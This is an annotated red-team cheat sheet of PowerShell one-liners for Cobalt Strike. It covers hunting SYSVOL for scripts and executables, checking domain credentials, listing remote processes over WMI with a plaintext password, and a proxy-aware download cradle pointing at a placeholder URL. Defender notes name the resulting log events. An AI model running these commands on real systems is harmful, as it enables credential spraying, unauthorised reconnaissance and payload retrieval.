Handy commands for Red Team engagements
# Collection of PowerShell one-liners; the `powerpick` prefix on most of them is the
# Cobalt Strike command that runs PowerShell without powershell.exe (the cradle on the
# last line is plain PowerShell). Angle-bracket tokens (<DC-hostname>, <fqdn>, <username>,
# <password>, <target-hostname>) are placeholders to substitute before use.
# Each command is annotated with what it touches and where it leaves traces for defenders.

# Hunting files on domain controllers: | |
# Recursively lists the DC's SYSVOL share and keeps entries whose Name matches the pattern.
# NOTE: -match is a regex match, so the unescaped "." matches any character: ".vbs"
# also matches names such as "xvbs" and is not anchored to the file extension.
# Defender note: a recursive walk of SYSVOL from a workstation appears on the DC as a
# burst of detailed file-share access events (Event 5145 when share auditing is enabled).
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".vbs"} | |
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".exe"} | |
# Validating password | |
# Loads System.DirectoryServices.AccountManagement, builds a domain PrincipalContext against
# the named DC and calls ValidateCredentials, which returns $true or $false for the pair.
# Defender note: every call is a real credential validation against the DC, so a wrong
# password typically surfaces as a failed-logon / credential-validation event there
# (4776 or 4625 depending on the authentication path); repeated calls look like spraying.
powerpick Add-Type -AssemblyName System.DirectoryServices.AccountManagement;$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain;$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, '<DC-hostname>');$principalContext.ValidateCredentials('<username>', '<password>') | |
# Curated output for listing processes (WMI) | |
# Wraps a cleartext password in a PSCredential, queries Win32_Process on the target over WMI
# with it, drops processes owned by SYSTEM or by an owner ending in "SERVICE", and prints
# ProcessID, Name and Owner as a list.
# NOTE: 'SYSTEM' contains no wildcard, so -NotLike there behaves as a plain case-insensitive
# inequality; GetOwner() is invoked up to three times per process.
# Defender note: the password is embedded in the command line itself, so PowerShell
# script-block logging (Event 4104) and the C2 framework's own command log both capture it
# verbatim. On the target, remote WMI queries are visible in the WMI-Activity operational
# log and as a network logon from the querying host.
powerpick $Password = ConvertTo-SecureString "<password>" -asplaintext -force; $Credential = New-Object -Typename System.Management.Automation.PSCredential -ArgumentList "<DOMAIN\username>",$Password;Get-WMIObject Win32_Process -computername <target-hostname> -Credential $Credential| ?{$_.GetOwner().User -NotLike 'SYSTEM' -and $_.GetOwner().User -NotLike "*SERVICE"} | select ProcessID,Name,@{n='Owner';e={$_.GetOwner().User}} | fl | |
# PowerShell download cradle with Proxy | |
# Resolves the system proxy, attaches the current user's default credentials to it, and
# fetches the URL as a string into $x through a WebClient. This line only downloads the
# content; nothing here executes it.
# Defender note: the proxy sees the current user's credentials and logs the requested URL,
# so the outbound proxy log and PowerShell script-block logging are the primary traces;
# WebClient.DownloadString from PowerShell is a widely used detection pivot.
$p=[System.Net.WebRequest]::GetSystemWebProxy();$p.Credentials=[System.Net.CredentialCache]::DefaultCredentials;$c=new-object system.net.WebClient;$c.proxy=$p;$x=$c.downloadstring('https://domain/test') |